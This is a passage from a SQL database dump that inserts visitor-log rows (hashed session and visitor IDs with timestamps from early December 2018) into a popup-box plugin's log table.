(34822, 'eee120b926949dd6c8e1d53e76d63157', '21571c67a0e229ec', 0, 2, 1, '2018-12-03 07:55:01'),
(34823, 'eee120b926949dd6c8e1d53e76d63157', '21571c67a0e229ec', 0, 2, 1, '2018-12-03 07:55:21'),
(34824, 'eee120b926949dd6c8e1d53e76d63157', '21571c67a0e229ec', 0, 2, 1, '2018-12-03 07:55:33'),
(34825, 'e90200a7e13f9d86ec25afb433d6f5b8', '84b0380814cfb885', 0, 2, 1, '2018-12-03 08:10:00'),
(34826, '8d7ae1a3020fe48e854ec3a832bfbc07', 'f5da1f529220c7c5', 0, 2, 1, '2018-12-03 08:14:53'),
(34827, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-03 08:16:11'),
(34828, 'a802890188a6baa6c9c8d72e004ee1d9', '53f3c8b13dbe3a12', 0, 2, 1, '2018-12-03 08:28:51'),
(34829, 'dc56138c9de341c13aceb50a583ef80c', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-03 08:31:05'),
(34830, 'dc56138c9de341c13aceb50a583ef80c', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-03 08:31:34'),
(34831, 'dc56138c9de341c13aceb50a583ef80c', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-03 08:32:04'),
(34832, 'dc56138c9de341c13aceb50a583ef80c', '7b445ab85e20f3ad', 0, 2, 1, '2018-12-03 08:32:23'),
(34833, '8d56090bb87ec28aabed90f8bda0d07c', 'be53f2123a05014f', 0, 2, 1, '2018-12-03 09:09:32'),
(34834, 'eb4c290bba1926f7ba53f1502decbeb0', '450508c1f979c0de', 0, 2, 1, '2018-12-03 09:31:23'),
(34835, 'f5ec4f9e9e54c2eb07edb1e53a9f3ec4', '9c23fb812ee903bd', 0, 2, 1, '2018-12-03 09:31:25'),
(34836, '0d2aadadc63d30450c155e5ad8b0c3bf', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-03 10:09:42'),
(34837, 'af2022885d37b1c77e5be9a45e0b18c2', 'fa33795932181f48', 0, 2, 1, '2018-12-03 10:11:28'),
(34838, '9f40727b585aeec11fb5b55cfb5ee32d', '21571c67a0e229ec', 0, 2, 1, '2018-12-03 10:23:33'),
(34839, 'a1c3bdff64d5b498c90951eb28b16dc1', '4ac3649550855e7d', 0, 2, 1, '2018-12-03 10:43:21'),
(34840, 'a1c3bdff64d5b498c90951eb28b16dc1', '4ac3649550855e7d', 0, 2, 1, '2018-12-03 10:45:50'),
(34841, '996565b3865d908a6881d17c4fae408c', '2c6780aa47f59236', 0, 2, 1, '2018-12-03 11:20:37'),
(34842, 'c4ce67c708f93aa00a5c4bf1216ebd4a', '826a56273120179e', 0, 2, 1, '2018-12-03 12:14:58'),
(34843, '9bc17b6fb202ab3cea31e94032704585', '51df446c19685386', 0, 2, 1, '2018-12-03 12:26:57'),
(34844, '72e2f0769f5203e6d7142b3918d0d24a', 'eebdc852a4cf166a', 0, 2, 1, '2018-12-03 12:34:08'),
(34845, '72e2f0769f5203e6d7142b3918d0d24a', 'eebdc852a4cf166a', 0, 2, 1, '2018-12-03 12:35:12'),
(34846, '9bc17b6fb202ab3cea31e94032704585', '51df446c19685386', 0, 2, 1, '2018-12-03 12:59:57'),
(34847, 'bc2f2a6e0b5c5ee7ce561ae6b53262a8', 'a8afa0e8186d2173', 0, 2, 1, '2018-12-03 14:14:37'),
(34848, 'bc2f2a6e0b5c5ee7ce561ae6b53262a8', 'a8afa0e8186d2173', 0, 2, 1, '2018-12-03 14:14:43'),
(34849, 'bc2f2a6e0b5c5ee7ce561ae6b53262a8', 'a8afa0e8186d2173', 0, 2, 1, '2018-12-03 14:14:54'),
(34850, 'bc2f2a6e0b5c5ee7ce561ae6b53262a8', 'a8afa0e8186d2173', 0, 2, 1, '2018-12-03 14:15:01'),
(34851, 'bc2f2a6e0b5c5ee7ce561ae6b53262a8', 'a8afa0e8186d2173', 0, 2, 1, '2018-12-03 14:17:34'),
(34852, 'bc2f2a6e0b5c5ee7ce561ae6b53262a8', 'a8afa0e8186d2173', 0, 2, 1, '2018-12-03 14:17:39'),
(34853, '53b67d616c0a1d3783ed4e92b4e34e3d', '717c0ca8059abbf0', 0, 2, 1, '2018-12-03 15:00:24'),
(34854, '596f4a3a103309c126dcc827d1096232', 'abe3ee3cfcfb3378', 0, 2, 1, '2018-12-03 15:10:38'),
(34855, 'a267b1ea6c53d8ac5b9702a0dc09ff56', 'a1a222418a5d3396', 0, 2, 1, '2018-12-03 16:07:13'),
(34856, 'f45843ce6d9a4c1c0061b1870fcdf545', 'cc4c76a65329df3e', 0, 2, 1, '2018-12-03 16:10:19'),
(34857, 'b2806d55ea3057135357285dee0a5d4f', '3ba3484de462963c', 0, 2, 1, '2018-12-03 16:36:04'),
(34858, 'c46af3437947379d7f34f10509582aa3', '354aff4e76611752', 0, 2, 1, '2018-12-03 16:57:08'),
(34859, 'd0563644bad07d44ac37bb61928bb512', '0d5265473f60cc71', 0, 2, 1, '2018-12-03 17:01:39'),
(34860, '509519c0c8e068304abc781675989f5e', '94f13fed2d4f50cb', 0, 2, 1, '2018-12-03 17:17:28'),
(34861, '7a664eb63a0d8bb6492dfe2000c13238', '21a83c510f06e3c5', 0, 2, 1, '2018-12-03 17:35:40'),
(34862, '948bd163661a39c07aa57211a661a9ee', '9ed5affd504a4dba', 0, 2, 1, '2018-12-03 18:14:13'),
(34863, '4a4e311f9da185ac1c2f025276500fba', '0d5265473f60cc71', 0, 2, 1, '2018-12-03 18:14:28'),
(34864, '4a4e311f9da185ac1c2f025276500fba', '0d5265473f60cc71', 0, 2, 1, '2018-12-03 18:44:33'),
(34865, '1bceb78ae8d5db509eb9029ad1650eeb', '392d04b2e76592c3', 0, 2, 1, '2018-12-03 18:51:29'),
(34866, '144f38541d3eca849b1f74281c7b4caa', '293268be6b1cc2b6', 0, 2, 1, '2018-12-03 19:08:38'),
(34867, '144f38541d3eca849b1f74281c7b4caa', '293268be6b1cc2b6', 0, 2, 1, '2018-12-03 19:11:39'),
(34868, '144f38541d3eca849b1f74281c7b4caa', '293268be6b1cc2b6', 0, 2, 1, '2018-12-03 19:12:21'),
(34869, 'c6ac4bf8cad9da7afc27e8f4d498b76e', 'df35f372753be77f', 0, 2, 1, '2018-12-03 20:03:38'),
(34870, 'f40ad561cdddc0d02cc4913a010f5a7e', 'c21b863ecdd30da4', 0, 2, 1, '2018-12-03 20:32:32'),
(34871, '1647c2cd146a6ee4acad85d0531e9e17', '0eafff4de1dbd711', 0, 2, 1, '2018-12-03 20:38:49'),
(34872, '1647c2cd146a6ee4acad85d0531e9e17', '0eafff4de1dbd711', 0, 2, 1, '2018-12-03 20:39:16'),
(34873, 'c99830e41e3c8fb6763fd5020207db9c', '5a89dfae3acf1e72', 0, 2, 1, '2018-12-03 21:05:35'),
(34874, 'a78c7d8119b7dda35c7b004bf8fab17d', '65e1125b6b5f8047', 0, 2, 1, '2018-12-03 21:22:23'),
(34875, 'c6b6917a35033a2d94e1c1f248e0c40d', 'b44ac6a2906794ff', 0, 2, 1, '2018-12-03 21:31:31'),
(34876, 'b3ff11df85ed4d799d2ab94b3645cf25', '96838f2a075a32df', 0, 2, 1, '2018-12-03 22:19:26'),
(34877, 'd7ce8a544407b2b335e21d620166ef1d', '5bc3566183b1ccd8', 0, 2, 1, '2018-12-03 22:32:31');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(34878, 'b913a2b005edd88da9516f4213e44c2f', '12a6c15697d0df26', 0, 2, 1, '2018-12-03 22:35:30'),
(34879, '29e4a22ed3bf5ef1b9ffa32577d92471', '1f0385ebd58d480f', 0, 2, 1, '2018-12-04 00:23:08'),
(34880, '29e4a22ed3bf5ef1b9ffa32577d92471', '1f0385ebd58d480f', 0, 2, 1, '2018-12-04 00:23:35'),
(34881, '29e4a22ed3bf5ef1b9ffa32577d92471', '1f0385ebd58d480f', 0, 2, 1, '2018-12-04 00:24:09'),
(34882, '1f7169a731823ec5ef4de32a5dd483ab', '156eec166022d688', 0, 2, 1, '2018-12-04 00:24:32'),
(34883, 'dfd16466ed927fb7ddc4175dcf591a5a', '5ffcf18230248f32', 0, 2, 1, '2018-12-04 00:49:47'),
(34884, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-04 02:42:59'),
(34885, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-04 02:54:40'),
(34886, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-04 02:54:41'),
(34887, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-04 03:01:53'),
(34888, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-12-04 03:01:55'),
(34889, '161b32e0dd9cf060661125f06fcaf247', 'c715814529014681', 0, 2, 1, '2018-12-04 04:08:00'),
(34890, '6115ee58a027e60e99f1fee80dd3c50d', '74c1f52419c25280', 0, 2, 1, '2018-12-04 04:33:27'),
(34891, '8ec872c39563b46da5a234f0415b5230', '695f2b5b1f1916ce', 0, 2, 1, '2018-12-04 05:18:56'),
(34892, '74bf3bcb93e6cce3f1c76fe246d99071', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-12-04 06:42:01'),
(34893, '74bf3bcb93e6cce3f1c76fe246d99071', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-12-04 06:42:10'),
(34894, 'acc63ff8e1c32bb9cccdb4dbde129652', 'b9f68f8f1e6af5e4', 0, 2, 1, '2018-12-04 07:12:47'),
(34895, 'e12b6f0c189dc35374675ff005333174', 'be53f2123a05014f', 0, 2, 1, '2018-12-04 07:20:30'),
(34896, '2acd38b37e7c3b1809fdd1fcec3784ed', '7bebe30f4422d37a', 0, 2, 1, '2018-12-04 07:25:38'),
(34897, '2acd38b37e7c3b1809fdd1fcec3784ed', '7bebe30f4422d37a', 0, 2, 1, '2018-12-04 07:26:51'),
(34898, '5b28cdf7b110a3483768014773dfda6e', '09e19bc70df3d227', 0, 2, 1, '2018-12-04 08:21:50'),
(34899, '60e7cbe284fb4544231d14d780ec0040', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-04 08:52:06'),
(34900, 'dcdaa434d6b6cfae6289b30ff483ba23', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-04 09:09:24'),
(34901, '0a93c454bde084744c98d6f639941c6c', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-04 09:59:52'),
(34902, '939138c2247582c88ac0e3d3c2ca063f', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-04 10:00:50'),
(34903, 'cfdc32b0fe1d6a41bb46a190fa6e3665', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-04 10:01:42'),
(34904, '78db808cbcffe0dc2d53967c60b57a69', '41e0de87fbc6ce2a', 0, 2, 1, '2018-12-04 11:18:11'),
(34905, '8600eecfab8560705df3f6057455e5d8', 'f298b642a1b6b28f', 0, 2, 1, '2018-12-04 11:43:06'),
(34906, '5032b182332c4d55780bb01e75aab8b1', '52eaf17c62f904e3', 0, 2, 1, '2018-12-04 12:12:45'),
(34907, 'f0cd89435835d63aab00dcb08da554dc', '6c435a777e97fb55', 0, 2, 1, '2018-12-04 13:20:02'),
(34908, '7549c3779aadaa5ca33c3325a199af70', '6aefc3e4971e8bc7', 0, 2, 1, '2018-12-04 13:23:14'),
(34909, '09df574785a360b835a719bcfd8b2e78', 'd2306ac95e30cde7', 0, 2, 1, '2018-12-04 14:18:46'),
(34910, '5027920f36ecd621d8081cf1689e3a57', '27acc8a4a77d32e9', 0, 2, 1, '2018-12-04 14:19:20'),
(34911, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2018-12-04 15:09:27'),
(34912, 'a7b09e396ee35acbb1dcc914303bdeed', '61eefb57e6c49666', 0, 2, 1, '2018-12-04 15:09:42'),
(34913, '4d96c733722cfb24bd8aa3ed96c46bd9', '7108ab43187becc4', 0, 2, 1, '2018-12-04 16:02:10'),
(34914, 'ff242092154f7e2363e4ec5c507f820b', '46f9d9088b9139e8', 0, 2, 1, '2018-12-04 16:04:23'),
(34915, '3464995ec77cdb8aab49eed6c6b32d9a', 'fee63765c08bd88c', 0, 2, 1, '2018-12-04 16:05:21'),
(34916, '3464995ec77cdb8aab49eed6c6b32d9a', 'fee63765c08bd88c', 0, 2, 1, '2018-12-04 16:05:42'),
(34917, '3464995ec77cdb8aab49eed6c6b32d9a', 'fee63765c08bd88c', 0, 2, 1, '2018-12-04 16:06:34'),
(34918, '3464995ec77cdb8aab49eed6c6b32d9a', 'fee63765c08bd88c', 0, 2, 1, '2018-12-04 16:06:47'),
(34919, '3464995ec77cdb8aab49eed6c6b32d9a', 'fee63765c08bd88c', 0, 2, 1, '2018-12-04 16:07:18'),
(34920, '3464995ec77cdb8aab49eed6c6b32d9a', 'fee63765c08bd88c', 0, 2, 1, '2018-12-04 16:07:31'),
(34921, '3464995ec77cdb8aab49eed6c6b32d9a', 'fee63765c08bd88c', 0, 2, 1, '2018-12-04 16:08:03'),
(34922, '03c44a7f723065f6809c3d06358f6090', '0f82ee3c80278677', 0, 2, 1, '2018-12-04 16:28:54'),
(34923, '8707b9a52a91bb99ef1378daaaf18bfb', 'fd9e13a25e929cea', 0, 2, 1, '2018-12-04 16:31:54'),
(34924, '12193b2f7feb23bc6169f181f87aed12', '3ba3484de462963c', 0, 2, 1, '2018-12-04 16:52:18'),
(34925, '3da35ce3bf14fa964a3f3931d6fd7979', '7fbc28142a4b55b4', 0, 2, 1, '2018-12-04 17:55:28'),
(34926, '3da35ce3bf14fa964a3f3931d6fd7979', '7fbc28142a4b55b4', 0, 2, 1, '2018-12-04 17:55:51'),
(34927, '128be56c787cebf773b95d49c4a939b6', 'e82929f4c944ef5c', 0, 2, 1, '2018-12-04 18:03:11'),
(34928, '8a5edfe164099df0792c58e49fc8edd8', '101317224b4423da', 0, 2, 1, '2018-12-04 18:11:34'),
(34929, '8d5740d53c1aca6ce384eba45059b3e9', '15874699bf306613', 0, 2, 1, '2018-12-04 18:52:38'),
(34930, '8d5740d53c1aca6ce384eba45059b3e9', '15874699bf306613', 0, 2, 1, '2018-12-04 18:52:44'),
(34931, '779c4f155595c8c27d1da37f1098011a', '7bfdcf99c2b125a2', 0, 2, 1, '2018-12-04 19:24:23'),
(34932, '4e12ec9f3cc35ea319fda81c1897fb1d', '1f7853c4c7b2de7f', 0, 2, 1, '2018-12-04 20:22:38'),
(34933, 'dd3cd5714dbbf259a8b51f97a251be78', '9fce78250ec13426', 0, 2, 1, '2018-12-04 20:56:41'),
(34934, '3dc4603f241100fde26f495d855e2bc1', '461fce19f1b497c8', 0, 2, 1, '2018-12-04 21:30:55'),
(34935, '3dc4603f241100fde26f495d855e2bc1', '461fce19f1b497c8', 0, 2, 1, '2018-12-04 21:31:16'),
(34936, 'fd8c47052c505637aef9eb6fca1bae74', 'a68412600e7c1f58', 0, 2, 1, '2018-12-05 00:07:13'),
(34937, 'a285f74f35bada55b7adac529d7476e3', '8c486bbfac783c56', 0, 2, 1, '2018-12-05 00:10:27'),
(34938, 'e517b0dca6b61886042ccf2a9642a5bd', 'b2e78912dacced42', 0, 2, 1, '2018-12-05 01:17:29'),
(34939, 'e517b0dca6b61886042ccf2a9642a5bd', 'b2e78912dacced42', 0, 2, 1, '2018-12-05 01:17:39'),
(34940, 'ac7e998cb20f219d091f72654199a65d', 'd775f79f49c116ea', 0, 2, 1, '2018-12-05 05:04:39'),
(34941, 'ac7e998cb20f219d091f72654199a65d', 'd775f79f49c116ea', 0, 2, 1, '2018-12-05 05:04:41'),
(34942, '77b0d52551c0e215ca8a84f2756cc1eb', 'a307e4ff8d1a8afb', 0, 2, 1, '2018-12-05 05:13:42'),
(34943, '60fb37b97895e30f23176ab7d8150d03', '2baace39618f81d4', 0, 2, 1, '2018-12-05 05:57:45'),
(34944, '60fb37b97895e30f23176ab7d8150d03', '2baace39618f81d4', 0, 2, 1, '2018-12-05 06:00:34'),
(34945, '60fb37b97895e30f23176ab7d8150d03', '2baace39618f81d4', 0, 2, 1, '2018-12-05 06:00:50'),
(34946, 'e90cd4f02d64c564fc68e758f8d21f7c', 'd71fa06dcd03ff23', 0, 2, 1, '2018-12-05 06:09:46'),
(34947, 'e90cd4f02d64c564fc68e758f8d21f7c', 'd71fa06dcd03ff23', 0, 2, 1, '2018-12-05 06:10:04'),
(34948, '91a94940cf73befb7cdabb45d79a2436', '9d5e5507583ca419', 0, 2, 1, '2018-12-05 06:30:17'),
(34949, '7720eceac69400a741be1c9eea763758', '354aff4e76611752', 0, 2, 1, '2018-12-05 06:36:06'),
(34950, 'e12b6f0c189dc35374675ff005333174', 'be53f2123a05014f', 0, 2, 1, '2018-12-05 08:05:24'),
(34951, 'da7de4d87949116a3aa56ad0a1030873', '4c2ef32d1907a114', 0, 2, 1, '2018-12-05 08:14:48'),
(34952, '8833958bdf2d29f3237a624390c816c4', 'f80999662cc5fb53', 0, 2, 1, '2018-12-05 08:40:17'),
(34953, '28034b62d568d149b4ab1088ca65f233', 'a4d8c55c3e6883f2', 0, 2, 1, '2018-12-05 10:17:38'),
(34954, '18b4a1e1f1cc7e22012e70d4d27f9e53', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-05 12:08:34'),
(34955, '5516ec54f864a14dace79e2affd1f2a2', '5c40fd54cbe625ac', 0, 2, 1, '2018-12-05 13:14:47'),
(34956, 'dc9dcb2e3f4e9bd2ac869ddc97f3d25d', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-05 14:44:42'),
(34957, 'a3a3d20b5ec764960aa44fcede3096b4', '3ba3484de462963c', 0, 2, 1, '2018-12-05 14:57:54'),
(34958, 'a0ac5f3c938f5106c0ff748cde7b4b5d', '5d05c790f4830fad', 0, 2, 1, '2018-12-05 15:07:38'),
(34959, 'a0ac5f3c938f5106c0ff748cde7b4b5d', '5d05c790f4830fad', 0, 2, 1, '2018-12-05 15:23:02'),
(34960, 'ed607dc396a7d52e653199cdcb64542e', '687058b58830fd3e', 0, 2, 1, '2018-12-05 15:34:59'),
(34961, 'ed607dc396a7d52e653199cdcb64542e', '687058b58830fd3e', 0, 2, 1, '2018-12-05 15:35:45'),
(34962, 'd1fc8953f166770bac4eeda0271f9e4b', '74aba437eea39f30', 0, 2, 1, '2018-12-05 15:39:19'),
(34963, '2b9ec4e7b82ef232e5f04bf638daf6a9', '46713cac27a94b83', 0, 2, 1, '2018-12-05 15:39:31'),
(34964, '2b9ec4e7b82ef232e5f04bf638daf6a9', '46713cac27a94b83', 0, 2, 1, '2018-12-05 15:39:47'),
(34965, 'a0ac5f3c938f5106c0ff748cde7b4b5d', '5d05c790f4830fad', 0, 2, 1, '2018-12-05 15:40:20'),
(34966, '3c46b604ec9317da2b9fbe03d46c4f0c', '7af987417edf9363', 0, 2, 1, '2018-12-05 15:40:45'),
(34967, 'ae8a44c04f5bc6cf49474946d5d8c438', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-12-05 15:40:46'),
(34968, 'f7bc1d0d4f7693b903f349903ecee228', '9e44bf506a40ca38', 0, 2, 1, '2018-12-05 15:43:23'),
(34969, 'ed607dc396a7d52e653199cdcb64542e', '687058b58830fd3e', 0, 2, 1, '2018-12-05 15:45:03'),
(34970, '2a22ae9fd1dddc60e7cdc373be56a2d7', '8ae00530824acfd3', 0, 2, 1, '2018-12-05 15:48:04'),
(34971, 'ed607dc396a7d52e653199cdcb64542e', '687058b58830fd3e', 0, 2, 1, '2018-12-05 15:48:22'),
(34972, '6b9c4d15bb20372721c6ec0f4bf74cd6', 'b442ab7a5f0aab8c', 0, 2, 1, '2018-12-05 15:49:38'),
(34973, 'ed607dc396a7d52e653199cdcb64542e', '687058b58830fd3e', 0, 2, 1, '2018-12-05 15:49:55'),
(34974, '6b9c4d15bb20372721c6ec0f4bf74cd6', 'b442ab7a5f0aab8c', 0, 2, 1, '2018-12-05 15:50:07'),
(34975, 'daddb5559a1ba5c39850a0fce527c324', 'c5425083518eb8f7', 0, 2, 1, '2018-12-05 15:50:18'),
(34976, 'ed607dc396a7d52e653199cdcb64542e', '687058b58830fd3e', 0, 2, 1, '2018-12-05 15:50:30'),
(34977, 'e0b6effa935f438c0edd87f409559519', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-05 15:53:10'),
(34978, 'e0b6effa935f438c0edd87f409559519', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-05 15:53:26'),
(34979, '331870c623bc5b6e85d073b90aba393a', '63f07a71b1eb739a', 0, 2, 1, '2018-12-05 15:54:02'),
(34980, 'd1fc8953f166770bac4eeda0271f9e4b', '74aba437eea39f30', 0, 2, 1, '2018-12-05 15:55:14'),
(34981, '1ae10da17ff7ea1fd22f6cc4f77440d5', 'f425f32fceb56b58', 0, 2, 1, '2018-12-05 15:55:45'),
(34982, '3990bb363ae4a574813a71bc82fcb49e', '84c73015e9e28e8a', 0, 2, 1, '2018-12-05 15:55:54'),
(34983, '3990bb363ae4a574813a71bc82fcb49e', '84c73015e9e28e8a', 0, 2, 1, '2018-12-05 15:56:27'),
(34984, '331870c623bc5b6e85d073b90aba393a', '63f07a71b1eb739a', 0, 2, 1, '2018-12-05 15:57:16'),
(34985, '37618a76bac57c30182bc2e17a0cc1fe', '32b169e936bbe5df', 0, 2, 1, '2018-12-05 15:57:30'),
(34986, '7575cea0f3136864954aec8d8a9809ff', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-05 16:00:40'),
(34987, '951dd19ca8d4283e766e0186f5d6f563', '0e323506d51b8213', 0, 2, 1, '2018-12-05 16:01:26'),
(34988, 'cc7be8fb0f549bb588a97a5f63735295', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-12-05 16:03:20'),
(34989, '37618a76bac57c30182bc2e17a0cc1fe', '32b169e936bbe5df', 0, 2, 1, '2018-12-05 16:03:29'),
(34990, 'cc7be8fb0f549bb588a97a5f63735295', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-12-05 16:03:36'),
(34991, '3990bb363ae4a574813a71bc82fcb49e', '84c73015e9e28e8a', 0, 2, 1, '2018-12-05 16:03:49'),
(34992, 'cc7be8fb0f549bb588a97a5f63735295', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-12-05 16:03:51'),
(34993, '7575cea0f3136864954aec8d8a9809ff', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-05 16:04:14'),
(34994, 'f7bc1d0d4f7693b903f349903ecee228', '9e44bf506a40ca38', 0, 2, 1, '2018-12-05 16:04:32'),
(34995, 'ba59cd288d2bcdd10913beb20608955a', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-12-05 16:05:22'),
(34996, 'a0ac5f3c938f5106c0ff748cde7b4b5d', '5d05c790f4830fad', 0, 2, 1, '2018-12-05 16:05:23'),
(34997, '37618a76bac57c30182bc2e17a0cc1fe', '32b169e936bbe5df', 0, 2, 1, '2018-12-05 16:05:41'),
(34998, 'ad385dda75cf77cbe85d5e7de4dc6420', '22905843105c275f', 0, 2, 1, '2018-12-05 16:05:42'),
(34999, 'bf026c6a9da36cf92dc9efeac3a0c187', '1fe68226bb896748', 0, 2, 1, '2018-12-05 16:06:09'),
(35000, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-05 16:06:31'),
(35001, 'cc7be8fb0f549bb588a97a5f63735295', 'ebe5e57f7bcb9be7', 0, 2, 1, '2018-12-05 16:06:47'),
(35002, 'ed607dc396a7d52e653199cdcb64542e', '687058b58830fd3e', 0, 2, 1, '2018-12-05 16:06:47'),
(35003, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-05 16:07:06'),
(35004, 'ac01e7aa2b649e4a51b7face256dc86a', 'cad202a09758cb3a', 0, 2, 1, '2018-12-05 16:07:31'),
(35005, '5bd30038e127d1873e4135bdcc13e292', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-05 16:07:36'),
(35006, '5bd30038e127d1873e4135bdcc13e292', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-05 16:07:55'),
(35007, '16001e64eb16ab77ae14a68492dae9ae', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-05 16:09:55'),
(35008, '699a17bcf52c2b15fd35cca8b2b37781', '1c68b977b911188c', 0, 2, 1, '2018-12-05 16:10:22'),
(35009, '699a17bcf52c2b15fd35cca8b2b37781', '1c68b977b911188c', 0, 2, 1, '2018-12-05 16:10:50'),
(35010, 'ff45254ee9f96fdfcc416830685808f7', 'cc57d17616cbbe86', 0, 2, 1, '2018-12-05 16:11:14'),
(35011, 'ffe752be686251df25506b823db95fa8', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-05 16:11:33'),
(35012, '18d592128a76ab625b5c7f87ac7def80', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-05 16:11:51'),
(35013, 'e0b6effa935f438c0edd87f409559519', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-05 16:12:03'),
(35014, '18d592128a76ab625b5c7f87ac7def80', '788bc96ed5d0e5f3', 0, 2, 1, '2018-12-05 16:12:06'),
(35015, '16001e64eb16ab77ae14a68492dae9ae', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-05 16:12:14'),
(35016, '8b929696d72d2aebc2105013f53ad98b', '721a08095e6444d9', 0, 2, 1, '2018-12-05 16:12:17'),
(35017, '699a17bcf52c2b15fd35cca8b2b37781', '1c68b977b911188c', 0, 2, 1, '2018-12-05 16:13:32'),
(35018, '8f2c8f562bdbb4a5a35755267f2f56ee', 'c3cf5a6b35eb7b99', 0, 2, 1, '2018-12-05 16:13:56'),
(35019, '23d7166df4e1c86fc0a2b24ba4fdda1f', '049dbeed11095c77', 0, 2, 1, '2018-12-05 16:14:02'),
(35020, '628542296d77a52c0090e7d464462dc5', 'a2a455ee27dc8a2c', 0, 2, 1, '2018-12-05 16:14:25'),
(35021, 'aca043575d424499ca28c4e497f27ad7', '3c0ef43b583fe622', 0, 2, 1, '2018-12-05 16:14:29'),
(35022, '16001e64eb16ab77ae14a68492dae9ae', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-05 16:14:52'),
(35023, '5bd30038e127d1873e4135bdcc13e292', 'ee15d3d6defea2e0', 0, 2, 1, '2018-12-05 16:14:54'),
(35024, '456eb4377774608a4bc373fb16e2e0e5', '7501b42c35accff7', 0, 2, 1, '2018-12-05 16:16:02'),
(35025, 'bf026c6a9da36cf92dc9efeac3a0c187', '1fe68226bb896748', 0, 2, 1, '2018-12-05 16:16:22'),
(35026, '6d874addb930089fccae9cd117796af7', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-05 16:16:22'),
(35027, '3c46b604ec9317da2b9fbe03d46c4f0c', '7af987417edf9363', 0, 2, 1, '2018-12-05 16:17:10'),
(35028, '0ca063a3289f41d58f64054ce1121c65', '9bd992699e70b92d', 0, 2, 1, '2018-12-05 16:17:24'),
(35029, '09f8db445f61fee1ce9d9d4e1df3dcbf', '91d21119de46096c', 0, 2, 1, '2018-12-05 16:17:39'),
(35030, '09f8db445f61fee1ce9d9d4e1df3dcbf', '91d21119de46096c', 0, 2, 1, '2018-12-05 16:17:42'),
(35031, '09f8db445f61fee1ce9d9d4e1df3dcbf', '91d21119de46096c', 0, 2, 1, '2018-12-05 16:17:54'),
(35032, '0aeb97a6fe8def100eef42b7bce2d843', '94526f1094c8a3e4', 0, 2, 1, '2018-12-05 16:19:04'),
(35033, '331870c623bc5b6e85d073b90aba393a', '63f07a71b1eb739a', 0, 2, 1, '2018-12-05 16:19:34'),
(35034, '489c13a961f77b64ffcd34cbd8cfdc58', 'd40300dc5b83c344', 0, 2, 1, '2018-12-05 16:19:57'),
(35035, '489c13a961f77b64ffcd34cbd8cfdc58', 'd40300dc5b83c344', 0, 2, 1, '2018-12-05 16:20:01'),
(35036, '331870c623bc5b6e85d073b90aba393a', '63f07a71b1eb739a', 0, 2, 1, '2018-12-05 16:20:02'),
(35037, '489c13a961f77b64ffcd34cbd8cfdc58', 'd40300dc5b83c344', 0, 2, 1, '2018-12-05 16:20:14'),
(35038, '37618a76bac57c30182bc2e17a0cc1fe', '32b169e936bbe5df', 0, 2, 1, '2018-12-05 16:21:08'),
(35039, '3cf5d3d4a10402320c4411aea1836b34', '4c07673592205f17', 0, 2, 1, '2018-12-05 16:22:42'),
(35040, '8b929696d72d2aebc2105013f53ad98b', '721a08095e6444d9', 0, 2, 1, '2018-12-05 16:24:29'),
(35041, '7158d4c254bef542c346ded3c39b9f4b', 'dace6e0c219330fc', 0, 2, 1, '2018-12-05 16:24:52'),
(35042, 'bbf84361820cdee3ce5372f03347ccfe', 'fc794f0a80972404', 0, 2, 1, '2018-12-05 16:25:55'),
(35043, 'bbf84361820cdee3ce5372f03347ccfe', 'fc794f0a80972404', 0, 2, 1, '2018-12-05 16:26:27'),
(35044, '6bf33655d67271a2ac868b680115be61', '60ed72c979f92224', 0, 2, 1, '2018-12-05 16:26:30'),
(35045, 'ceb431b3469e820d94bb8db4d6c41c5f', '85fbf6551e3e1a54', 0, 2, 1, '2018-12-05 16:30:57'),
(35046, 'ceb431b3469e820d94bb8db4d6c41c5f', '85fbf6551e3e1a54', 0, 2, 1, '2018-12-05 16:31:16'),
(35047, 'ceb431b3469e820d94bb8db4d6c41c5f', '85fbf6551e3e1a54', 0, 2, 1, '2018-12-05 16:31:21'),
